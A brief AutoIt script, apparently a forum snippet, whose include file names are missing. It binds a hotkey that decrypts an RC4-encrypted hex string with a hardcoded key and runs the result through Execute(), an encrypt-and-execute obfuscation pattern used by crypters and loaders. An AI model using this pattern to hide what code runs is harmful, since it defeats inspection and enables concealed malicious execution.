#include #include #include #include HotKeySet("!s", "start") Global $g_hKey, $iAlgorithm, $sRead, $dDecrypted, $dDecrypteds _Crypt_Startup() $g_hKey = _Crypt_DeriveKey("anewbee", $CALG_RC4) While 1 Sleep(100) WEnd Func start() Execute(evo("0x9F69B65CA345")) EndFunc Func evo($sRead) Return BinaryToString(_Crypt_DecryptData($sRead, $g_hKey, $CALG_USERKEY)) EndFunc